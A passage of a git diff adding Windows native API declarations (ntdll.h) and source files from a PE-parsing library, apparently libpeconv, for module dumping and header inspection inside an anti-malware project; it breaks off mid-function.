any specific access. + + RequestMessage - Points to a caller-allocated buffer or variable + that specifies the request message to send to the port. + +--*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtRequestPort ( + IN HANDLE PortHandle, + IN PPORT_MESSAGE RequestMessage + ); + +/*++ + + NtRequestWaitReplyPort + ====================== + + Sends a request message to a port and waits for a reply (client side) + + PortHandle - A handle to a port object. The handle doesn't need + to grant any specific access. + + RequestMessage - Points to a caller-allocated buffer or variable + that specifies the request message to send to the port. + + ReplyMessage - Points to a caller-allocated buffer or variable + that receives the reply message sent to the port. + +--*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtRequestWaitReplyPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE RequestMessage, + OUT PPORT_MESSAGE ReplyMessage + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwRequestWaitReplyPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE RequestMessage, + OUT PPORT_MESSAGE ReplyMessage + ); + + +/*++ + + NtReplyPort + =========== + + Sends a reply message to a port (Server side) + + PortHandle - A handle to a port object. The handle doesn't need + to grant any specific access. + + ReplyMessage - Points to a caller-allocated buffer or variable + that specifies the reply message to send to the port. + +--*/ + + +NTSYSAPI +NTSTATUS +NTAPI +NtReplyPort( + IN HANDLE PortHandle, + IN PPORT_MESSAGE ReplyMessage + ); + +/*++ + + NtReplyWaitReplyPort + ==================== + + Sends a reply message to a port and waits for a reply message + + PortHandle - A handle to a port object. The handle doesn't need + to grant any specific access. + + ReplyMessage - Points to a caller-allocated buffer or variable + that specifies the reply message to send to the port. + +--*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtReplyWaitReplyPort( + IN HANDLE PortHandle, + IN OUT PPORT_MESSAGE ReplyMessage + ); + + +/*++ + + NtReplyWaitReceivePort + ====================== + + Optionally sends a reply message to a port and waits for a + message + + PortHandle - A handle to a port object. The handle doesn't need + to grant any specific access. + + PortContext - Optionally points to a variable that receives + a numeric identifier associated with the port. + + ReplyMessage - Optionally points to a caller-allocated buffer + or variable that specifies the reply message to send to the port. + + ReceiveMessage - Points to a caller-allocated buffer or variable + that receives the message sent to the port. + +--*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtReplyWaitReceivePort( + IN HANDLE PortHandle, + OUT PVOID *PortContext OPTIONAL, + IN PPORT_MESSAGE ReplyMessage OPTIONAL, + OUT PPORT_MESSAGE ReceiveMessage + ); + +//----------------------------------------------------------------------------- +// Heap functions + +#define HEAP_NO_SERIALIZE 0x00000001 +#define HEAP_GROWABLE 0x00000002 +#define HEAP_GENERATE_EXCEPTIONS 0x00000004 +#define HEAP_ZERO_MEMORY 0x00000008 +#define HEAP_REALLOC_IN_PLACE_ONLY 0x00000010 +#define HEAP_TAIL_CHECKING_ENABLED 0x00000020 +#define HEAP_FREE_CHECKING_ENABLED 0x00000040 +#define HEAP_DISABLE_COALESCE_ON_FREE 0x00000080 +#define HEAP_CREATE_ALIGN_16 0x00010000 +#define HEAP_CREATE_ENABLE_TRACING 0x00020000 +#define HEAP_MAXIMUM_TAG 0x0FFF +#define HEAP_PSEUDO_TAG_FLAG 0x8000 + +// +// Data structure for heap definition. This includes various +// sizing parameters and callback routines, which, if left NULL, +// result in default behavior +// + +typedef struct RTL_HEAP_PARAMETERS { + ULONG Length; //sizeof(RTL_HEAP_PARAMETERS) + ULONG SegmentReserve; + ULONG SegmentCommit; + ULONG DeCommitFreeBlockThreshold; + ULONG DeCommitTotalFreeThreshold; + ULONG MaximumAllocationSize; + ULONG VirtualMemoryThreshold; + ULONG InitialCommit; + ULONG InitialReserve; + PVOID CommitRoutine; + ULONG Reserved; +} RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS; + + +#define RtlProcessHeap() (HANDLE)(NtCurrentTeb()->ProcessEnvironmentBlock->ProcessHeap) + + +NTSYSAPI +HANDLE +NTAPI +RtlCreateHeap ( + IN ULONG Flags, + IN PVOID BaseAddress OPTIONAL, + IN ULONG SizeToReserve, + IN ULONG SizeToCommit, + IN BOOLEAN Lock OPTIONAL, + IN PRTL_HEAP_PARAMETERS Definition OPTIONAL + ); + + +NTSYSAPI +ULONG +NTAPI +RtlDestroyHeap ( + IN HANDLE HeapHandle + ); + + +NTSYSAPI +PVOID +NTAPI +RtlAllocateHeap ( + IN HANDLE HeapHandle, + IN ULONG Flags, + IN ULONG Size + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlFreeHeap ( + IN HANDLE HeapHandle, + IN ULONG Flags, + IN PVOID Address + ); + + +NTSYSAPI +ULONG +NTAPI +RtlCompactHeap ( + IN HANDLE HeapHandle, + IN ULONG Flags + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlLockHeap ( + IN HANDLE HeapHandle + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlUnlockHeap ( + IN HANDLE HeapHandle + ); + + +NTSYSAPI +PVOID +NTAPI +RtlReAllocateHeap ( + IN HANDLE HeapHandle, + IN ULONG Flags, + IN PVOID Address, + IN ULONG Size + ); + + +NTSYSAPI +ULONG +NTAPI +RtlSizeHeap ( + IN HANDLE HeapHandle, + IN ULONG Flags, + IN PVOID Address + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlValidateHeap ( + IN HANDLE HeapHandle, + IN ULONG Flags, + IN PVOID Address OPTIONAL + ); + + +//----------------------------------------------------------------------------- +// Virtual memory functions + +NTSYSAPI +NTSTATUS +NTAPI +NtAllocateVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG ZeroBits, + IN OUT PULONG RegionSize, + IN ULONG AllocationType, + IN ULONG Protect + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwAllocateVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG ZeroBits, + IN OUT PULONG RegionSize, + IN ULONG AllocationType, + IN ULONG Protect + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtFreeVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PULONG RegionSize, + IN ULONG FreeType + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwFreeVirtualMemory ( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PULONG RegionSize, + IN ULONG FreeType + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtReadVirtualMemory( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + OUT PVOID Buffer, + IN ULONG NumberOfBytesToRead, + OUT PULONG NumberOfBytesRead OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtWriteVirtualMemory( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + IN PVOID Buffer, + IN ULONG NumberOfBytesToWrite, + OUT PULONG NumberOfBytesWritten OPTIONAL + ); + + +//----------------------------------------------------------------------------- +// Section functions + +typedef enum _SECTION_INHERIT +{ + ViewShare = 1, + ViewUnmap = 2 + +} SECTION_INHERIT; + + +typedef enum _SECTION_INFORMATION_CLASS +{ + SectionBasicInformation, + SectionImageInformation + +} SECTION_INFORMATION_CLASS, *PSECTION_INFORMATION_CLASS; + + +/*++ + + NtCreateSection + =============== + + Creates a section object. + + SectionHandle - Points to a variable that will receive the section + object handle if the call is successful. + + DesiredAccess - Specifies the type of access that the caller requires + to the section object. This parameter can be zero, or any combination + of the following flags: + + SECTION_QUERY - Query access + SECTION_MAP_WRITE - Can be written when mapped + SECTION_MAP_READ - Can be read when mapped + SECTION_MAP_EXECUTE - Can be executed when mapped + SECTION_EXTEND_SIZE - Extend access + SECTION_ALL_ACCESS - All of the preceding + + STANDARD_RIGHTS_REQUIRED + + ObjectAttributes - Points to a structure that specifies the object s attributes. + OBJ_OPENLINK is not a valid attribute for a section object. + + MaximumSize - Optionally points to a variable that specifies the size, + in bytes, of the section. If FileHandle is zero, the size must be + specified; otherwise, it can be defaulted from the size of the file + referred to by FileHandle. + + SectionPageProtection - The protection desired for the pages + of the section when the section is mapped. This parameter can take + one of the following values: + + PAGE_READONLY + PAGE_READWRITE + PAGE_WRITECOPY + PAGE_EXECUTE + PAGE_EXECUTE_READ + PAGE_EXECUTE_READWRITE + PAGE_EXECUTE_WRITECOPY + + AllocationAttributes - The attributes for the section. This parameter must + be a combination of the following values: + + SEC_BASED 0x00200000 // Map section at same address in each process + SEC_NO_CHANGE 0x00400000 // Disable changes to protection of pages + SEC_IMAGE 0x01000000 // Map section as an image + SEC_VLM 0x02000000 // Map section in VLM region + SEC_RESERVE 0x04000000 // Reserve without allocating pagefile storage + SEC_COMMIT 0x08000000 // Commit pages; the default behavior + SEC_NOCACHE 0x10000000 // Mark pages as non-cacheable + + FileHandle - Identifies the file from which to create the section object. + The file must be opened with an access mode compatible with the protection + flags specified by the Protect parameter. If FileHandle is zero, + the function creates a section object of the specified size backed + by the paging file rather than by a named file in the file system. + +--*/ + + +NTSYSAPI +NTSTATUS +NTAPI +NtCreateSection( + OUT PHANDLE SectionHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, + IN PLARGE_INTEGER MaximumSize OPTIONAL, + IN ULONG SectionPageProtection, + IN ULONG AllocationAttributes, + IN HANDLE FileHandle OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwCreateSection( + OUT PHANDLE SectionHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, + IN PLARGE_INTEGER MaximumSize OPTIONAL, + IN ULONG SectionPageProtection, + IN ULONG AllocationAttributes, + IN HANDLE FileHandle OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenSection ( + OUT PHANDLE SectionHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwOpenSection ( + OUT PHANDLE SectionHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtMapViewOfSection ( + IN HANDLE SectionHandle, + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG ZeroBits, + IN ULONG CommitSize, + IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, + IN OUT PULONG ViewSize, + IN SECTION_INHERIT InheritDisposition, + IN ULONG AllocationType, + IN ULONG Protect + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwMapViewOfSection ( + IN HANDLE SectionHandle, + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG ZeroBits, + IN ULONG CommitSize, + IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, + IN OUT PULONG ViewSize, + IN SECTION_INHERIT InheritDisposition, + IN ULONG AllocationType, + IN ULONG Protect + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtUnmapViewOfSection ( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwUnmapViewOfSection ( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtExtendSection ( + IN HANDLE SectionHandle, + IN OUT PLARGE_INTEGER SectionSize + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwExtendSection ( + IN HANDLE SectionHandle, + IN OUT PLARGE_INTEGER SectionSize + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQuerySection ( + IN HANDLE SectionHandle, + IN SECTION_INFORMATION_CLASS SectionInformationClass, + OUT PVOID SectionInformation, + IN ULONG Length, + OUT PULONG ResultLength OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwQuerySection ( + IN HANDLE SectionHandle, + IN SECTION_INFORMATION_CLASS SectionInformationClass, + OUT PVOID SectionInformation, + IN ULONG Length, + OUT PULONG ResultLength OPTIONAL + ); + + +//----------------------------------------------------------------------------- +// Synchronization + +// +// Wait type +// + +typedef enum _WAIT_TYPE { + WaitAll, + WaitAny + } WAIT_TYPE; + + +NTSYSAPI +NTSTATUS +NTAPI +NtWaitForSingleObject ( + IN HANDLE Handle, + IN BOOLEAN Alertable, + IN PLARGE_INTEGER Timeout OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwWaitForSingleObject ( + IN HANDLE Handle, + IN BOOLEAN Alertable, + IN PLARGE_INTEGER Timeout OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtWaitForMultipleObjects ( + IN ULONG Count, + IN HANDLE Handle[], + IN WAIT_TYPE WaitType, + IN BOOLEAN Alertable, + IN PLARGE_INTEGER Timeout OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwWaitForMultipleObjects ( + IN ULONG Count, + IN HANDLE Handle[], + IN WAIT_TYPE WaitType, + IN BOOLEAN Alertable, + IN PLARGE_INTEGER Timeout OPTIONAL + ); + + +//----------------------------------------------------------------------------- +// Event support + +typedef enum _EVENT_INFORMATION_CLASS { + EventBasicInformation // = 0 +} EVENT_INFORMATION_CLASS; + +typedef struct _EVENT_BASIC_INFORMATION { + EVENT_TYPE EventType; + LONG EventState; +} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION; + +// +// Event handling routines +// + + +NTSYSAPI +NTSTATUS +NTAPI +NtCreateEvent ( + OUT PHANDLE EventHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, + IN EVENT_TYPE EventType, + IN BOOLEAN InitialState + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwCreateEvent ( + OUT PHANDLE EventHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, + IN EVENT_TYPE EventType, + IN BOOLEAN InitialState + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtClearEvent ( + IN HANDLE Handle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwClearEvent ( + IN HANDLE Handle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtPulseEvent ( + IN HANDLE Handle, + OUT PLONG PreviousState OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwPulseEvent ( + IN HANDLE Handle, + OUT PLONG PreviousState OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtResetEvent ( + IN HANDLE Handle, + OUT PLONG PreviousState OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwResetEvent ( + IN HANDLE Handle, + OUT PLONG PreviousState OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetEvent ( + IN HANDLE Handle, + OUT PLONG PreviousState OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwSetEvent ( + IN HANDLE Handle, + OUT PLONG PreviousState OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenEvent ( + OUT PHANDLE EventHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwOpenEvent ( + OUT PHANDLE EventHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryEvent ( + IN HANDLE EventHandle, + IN EVENT_INFORMATION_CLASS EventInfoClass, + OUT PVOID EventInfo, + IN ULONG Length, + OUT PULONG ResultLength OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwQueryEvent ( + IN HANDLE EventHandle, + IN EVENT_INFORMATION_CLASS EventInfoClass, + OUT PVOID EventInfo, + IN ULONG Length, + OUT PULONG ResultLength OPTIONAL + ); + + +//----------------------------------------------------------------------------- +// Security descriptor functions + +NTSYSAPI +NTSTATUS +NTAPI +RtlCreateSecurityDescriptor ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN ULONG Revision + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlSetDaclSecurityDescriptor( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN BOOLEAN DaclPresent, + IN PACL Dacl OPTIONAL, + IN BOOLEAN DaclDefaulted OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlSetOwnerSecurityDescriptor ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN PSID Owner OPTIONAL, + IN BOOLEAN OwnerDefaulted OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlAllocateAndInitializeSid( + IN PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, + IN UCHAR SubAuthorityCount, + IN ULONG SubAuthority0, + IN ULONG SubAuthority1, + IN ULONG SubAuthority2, + IN ULONG SubAuthority3, + IN ULONG SubAuthority4, + IN ULONG SubAuthority5, + IN ULONG SubAuthority6, + IN ULONG SubAuthority7, + OUT PSID *Sid + ); + + +NTSYSAPI +ULONG +NTAPI +RtlLengthSid ( + IN PSID Sid + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlEqualSid ( + IN PSID Sid1, + IN PSID Sid2 + ); + + +NTSYSAPI +PVOID +NTAPI +RtlFreeSid( + IN PSID Sid + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlCreateAcl( + IN PACL Acl, + IN ULONG AclLength, + IN ULONG AclRevision + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlAddAccessAllowedAce( + IN OUT PACL Acl, + IN ULONG AceRevision, + IN ACCESS_MASK AccessMask, + IN PSID Sid + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlAddAccessAllowedAceEx( + IN OUT PACL Acl, + IN ULONG AceRevision, + IN ULONG AceFlags, + IN ULONG AccessMask, + IN PSID Sid + ); + +//----------------------------------------------------------------------------- +// Token functions + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenProcessToken( + IN HANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + OUT PHANDLE TokenHandle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenThreadToken( + IN HANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN BOOLEAN OpenAsSelf, + OUT PHANDLE TokenHandle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryInformationToken( + IN HANDLE TokenHandle, + IN TOKEN_INFORMATION_CLASS TokenInformationClass, + OUT PVOID TokenInformation, + IN ULONG TokenInformationLength, + OUT PULONG ReturnLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetInformationToken( + IN HANDLE TokenHandle, + IN TOKEN_INFORMATION_CLASS TokenInformationClass, + IN PVOID TokenInformation, + IN ULONG TokenInformationLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtAdjustPrivilegesToken( + IN HANDLE TokenHandle, + IN BOOLEAN DisableAllPrivileges, + IN PTOKEN_PRIVILEGES NewState OPTIONAL, + IN ULONG BufferLength OPTIONAL, + IN PTOKEN_PRIVILEGES PreviousState OPTIONAL, + OUT PULONG ReturnLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtDuplicateToken( + IN HANDLE ExistingTokenHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN BOOLEAN EffectiveOnly, + IN TOKEN_TYPE TokenType, + OUT PHANDLE NewTokenHandle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtCompareTokens( + IN HANDLE FirstTokenHandle, + IN HANDLE SecondTokenHandle, + OUT PBOOLEAN IdenticalTokens + ); + + +//----------------------------------------------------------------------------- +// Symbolic links + +// +// Object Manager Symbolic Link Specific Access Rights. +// + +#ifndef SYMBOLIC_LINK_QUERY +#define SYMBOLIC_LINK_QUERY (0x0001) +#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) +#endif + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenSymbolicLinkObject ( + OUT PHANDLE SymbolicLinkHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQuerySymbolicLinkObject ( + IN HANDLE SymbolicLinkHandle, + OUT PUNICODE_STRING NameString, + OUT PULONG ResultLength OPTIONAL + ); + +//----------------------------------------------------------------------------- +// Loader functions + +NTSYSAPI +NTSTATUS +NTAPI +LdrGetDllHandle( + IN PWSTR DllPath OPTIONAL, + IN PULONG DllCharacteristics OPTIONAL, + IN PUNICODE_STRING DllName, + OUT PVOID * DllHandle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +LdrGetProcedureAddress( + IN PVOID DllHandle, + IN PANSI_STRING ProcedureName OPTIONAL, + IN ULONG ProcedureNumber OPTIONAL, + OUT PVOID *ProcedureAddress + ); + + +NTSYSAPI +NTSTATUS +NTAPI +LdrLoadDll( + IN PWSTR DllPath OPTIONAL, + IN PULONG DllCharacteristics OPTIONAL, + IN PUNICODE_STRING DllName, + OUT PVOID *DllHandle + ); + +NTSYSAPI +NTSTATUS +NTAPI +LdrFindEntryForAddress( + IN PVOID Address, + OUT PLDR_DATA_TABLE_ENTRY *Module + ); + +NTSYSAPI +VOID +NTAPI + RtlGetCallersAddress( + OUT PVOID *CallersAddress, + OUT PVOID *CallersCaller + ); + +//----------------------------------------------------------------------------- +// Functions dealing with NTSTATUS and Win32 error + +NTSYSAPI +ULONG +NTAPI +RtlNtStatusToDosError( + NTSTATUS Status + ); + + +NTSYSAPI +ULONG +NTAPI +RtlNtStatusToDosErrorNoTeb( + NTSTATUS Status + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlGetLastNtStatus( + ); + + +NTSYSAPI +ULONG +NTAPI +RtlGetLastWin32Error( + ); + + +NTSYSAPI +VOID +NTAPI +RtlSetLastWin32Error( + ULONG WinError + ); + + +NTSYSAPI +VOID +NTAPI +RtlSetLastWin32ErrorAndNtStatusFromNtStatus( + NTSTATUS Status + ); + + +//----------------------------------------------------------------------------- +// I/O functions + + +NTSYSAPI +NTSTATUS +NTAPI +NtDisplayString( + IN PUNICODE_STRING String + ); + + +#ifdef __cplusplus +} // extern "C" +#endif + +#endif // __NTDLL_H__ diff --git a/ai_anti_malware/libpeconv/libpeconv/src/pe_dumper.cpp b/ai_anti_malware/libpeconv/libpeconv/src/pe_dumper.cpp new file mode 100644 index 0000000..29824c6 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/pe_dumper.cpp @@ -0,0 +1,73 @@ +#include "peconv/pe_dumper.h" + +#include "peconv/pe_hdrs_helper.h" +#include "peconv/pe_virtual_to_raw.h" +#include "peconv/fix_imports.h" +#include "peconv/file_util.h" +#include "peconv/pe_mode_detector.h" +#include "fix_dot_net_ep.h" + +#include + +using namespace peconv; + +t_pe_dump_mode peconv::detect_dump_mode(IN const BYTE* buffer, IN size_t mod_size) +{ + const t_pe_dump_mode default_mode = peconv::PE_DUMP_UNMAP; + if (peconv::is_pe_raw(buffer, mod_size)) { + return peconv::PE_DUMP_VIRTUAL; + } + if (peconv::is_pe_expanded(buffer, mod_size)) { + return peconv::PE_DUMP_REALIGN; + } + return default_mode; +} + +bool peconv::dump_pe(IN const char *out_path, + IN OUT BYTE *buffer, IN size_t mod_size, + IN const ULONGLONG start_addr, + IN OUT t_pe_dump_mode &dump_mode, + IN OPTIONAL const peconv::ExportsMapper* exportsMap +) +{ + // if the exportsMap is supplied, attempt to recover the (destroyed) import table: + if (exportsMap != nullptr) { + if (!peconv::fix_imports(buffer, mod_size, *exportsMap, NULL)) { + std::cerr << "[-] Unable to fix imports!" << std::endl; + } + } + if (dump_mode == PE_DUMP_AUTO || dump_mode >= PE_DUMP_MODES_COUNT) { + dump_mode = detect_dump_mode(buffer, mod_size); + } + + BYTE* dump_data = buffer; + size_t dump_size = mod_size; + size_t out_size = 0; + BYTE* unmapped_module = nullptr; + + if (dump_mode == peconv::PE_DUMP_UNMAP || dump_mode == peconv::PE_DUMP_REALIGN) { + //if the image base in headers is invalid, set the current base and prevent from relocating PE: + if (peconv::get_image_base(buffer) == 0) { + peconv::update_image_base(buffer, (ULONGLONG)start_addr); + } + if (is_dot_net(buffer, mod_size)) { + fix_dot_net_ep(buffer, mod_size); + } + if (dump_mode == peconv::PE_DUMP_UNMAP) { + unmapped_module = pe_virtual_to_raw(buffer, mod_size, (ULONGLONG)start_addr, out_size, false); + } + else if (dump_mode == peconv::PE_DUMP_REALIGN) { + unmapped_module = peconv::pe_realign_raw_to_virtual(buffer, mod_size, (ULONGLONG)start_addr, out_size); + } + // unmap the PE file (convert from the Virtual Format into Raw Format) + if (unmapped_module) { + dump_data = unmapped_module; + dump_size = out_size; + } + } + // save the read module into a file + const bool is_dumped = dump_to_file(out_path, dump_data, dump_size); + + peconv::free_pe_buffer(unmapped_module, mod_size); + return is_dumped; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/pe_hdrs_helper.cpp b/ai_anti_malware/libpeconv/libpeconv/src/pe_hdrs_helper.cpp new file mode 100644 index 0000000..ee9d4fb --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/pe_hdrs_helper.cpp @@ -0,0 +1,633 @@ +#include "peconv/pe_hdrs_helper.h" + +using namespace peconv; + +#ifdef _DEBUG +#include +#endif + +BYTE* peconv::get_nt_hdrs(IN const BYTE *pe_buffer, IN OPTIONAL size_t buffer_size) +{ + if (!pe_buffer) return nullptr; + + IMAGE_DOS_HEADER *idh = (IMAGE_DOS_HEADER*)pe_buffer; + if (buffer_size != 0) { + if (!peconv::validate_ptr((LPVOID)pe_buffer, buffer_size, (LPVOID)idh, sizeof(IMAGE_DOS_HEADER))) { + return nullptr; + } + } + if (IsBadReadPtr(idh, sizeof(IMAGE_DOS_HEADER))) { + return nullptr; + } + if (idh->e_magic != IMAGE_DOS_SIGNATURE) { + return nullptr; + } + const LONG kMaxOffset = 1024; + LONG pe_offset = idh->e_lfanew; + + if (pe_offset > kMaxOffset) return nullptr; + + IMAGE_NT_HEADERS32 *inh = (IMAGE_NT_HEADERS32 *)(pe_buffer + pe_offset); + if (buffer_size != 0) { + if (!peconv::validate_ptr((LPVOID)pe_buffer, buffer_size, (LPVOID)inh, sizeof(IMAGE_NT_HEADERS32))) { + return nullptr; + } + } + if (IsBadReadPtr(inh, sizeof(IMAGE_NT_HEADERS32))) { + return nullptr; + } + if (inh->Signature != IMAGE_NT_SIGNATURE) { + return nullptr; + } + return (BYTE*)inh; +} + +IMAGE_NT_HEADERS32* peconv::get_nt_hdrs32(IN const BYTE *payload) +{ + if (!payload) return nullptr; + + BYTE *ptr = get_nt_hdrs(payload); + if (!ptr) return nullptr; + + if (!is64bit(payload)) { + return (IMAGE_NT_HEADERS32*)ptr; + } + return nullptr; +} + +IMAGE_NT_HEADERS64* peconv::get_nt_hdrs64(IN const BYTE *payload) +{ + if (payload == nullptr) return nullptr; + + BYTE *ptr = get_nt_hdrs(payload); + if (!ptr) return nullptr; + + if (is64bit(payload)) { + return (IMAGE_NT_HEADERS64*)ptr; + } + return nullptr; +} + +DWORD peconv::get_image_size(IN const BYTE *payload) +{ + if (!get_nt_hdrs(payload)) { + return 0; + } + DWORD image_size = 0; + if (is64bit(payload)) { + IMAGE_NT_HEADERS64* nt64 = get_nt_hdrs64(payload); + image_size = nt64->OptionalHeader.SizeOfImage; + } else { + IMAGE_NT_HEADERS32* nt32 = get_nt_hdrs32(payload); + image_size = nt32->OptionalHeader.SizeOfImage; + } + return image_size; +} + +bool peconv::update_image_size(IN OUT BYTE* payload, IN DWORD image_size) +{ + if (!get_nt_hdrs(payload)) { + return false; + } + if (is64bit(payload)) { + IMAGE_NT_HEADERS64* nt64 = get_nt_hdrs64(payload); + nt64->OptionalHeader.SizeOfImage = image_size; + } + else { + IMAGE_NT_HEADERS32* nt32 = get_nt_hdrs32(payload); + nt32->OptionalHeader.SizeOfImage = image_size; + } + return true; +} + +WORD peconv::get_nt_hdr_architecture(IN const BYTE *pe_buffer) +{ + void *ptr = get_nt_hdrs(pe_buffer); + if (!ptr) return 0; + + IMAGE_NT_HEADERS32 *inh = static_cast(ptr); + if (IsBadReadPtr(inh, sizeof(IMAGE_NT_HEADERS32))) { + return 0; + } + return inh->OptionalHeader.Magic; +} + +bool peconv::is64bit(IN const BYTE *pe_buffer) +{ + WORD arch = get_nt_hdr_architecture(pe_buffer); + if (arch == IMAGE_NT_OPTIONAL_HDR64_MAGIC) { + return true; + } + return false; +} + +IMAGE_DATA_DIRECTORY* peconv::get_directory_entry(IN const BYTE *pe_buffer, IN DWORD dir_id, IN bool allow_empty) +{ + if (dir_id >= IMAGE_NUMBEROF_DIRECTORY_ENTRIES) return nullptr; + + BYTE* nt_headers = get_nt_hdrs((BYTE*)pe_buffer); + if (!nt_headers) return nullptr; + + IMAGE_DATA_DIRECTORY* peDir = nullptr; + if (is64bit(pe_buffer)) { + IMAGE_NT_HEADERS64* nt_headers64 = (IMAGE_NT_HEADERS64*)nt_headers; + peDir = &(nt_headers64->OptionalHeader.DataDirectory[dir_id]); + } + else { + IMAGE_NT_HEADERS32* nt_headers64 = (IMAGE_NT_HEADERS32*)nt_headers; + peDir = &(nt_headers64->OptionalHeader.DataDirectory[dir_id]); + } + if (!allow_empty && peDir->VirtualAddress == NULL) { + return nullptr; + } + return peDir; +} + +ULONGLONG peconv::get_image_base(IN const BYTE *pe_buffer) +{ + bool is64b = is64bit(pe_buffer); + //update image base in the written content: + BYTE* payload_nt_hdr = get_nt_hdrs(pe_buffer); + if (!payload_nt_hdr) { + return 0; + } + ULONGLONG img_base = 0; + if (is64b) { + 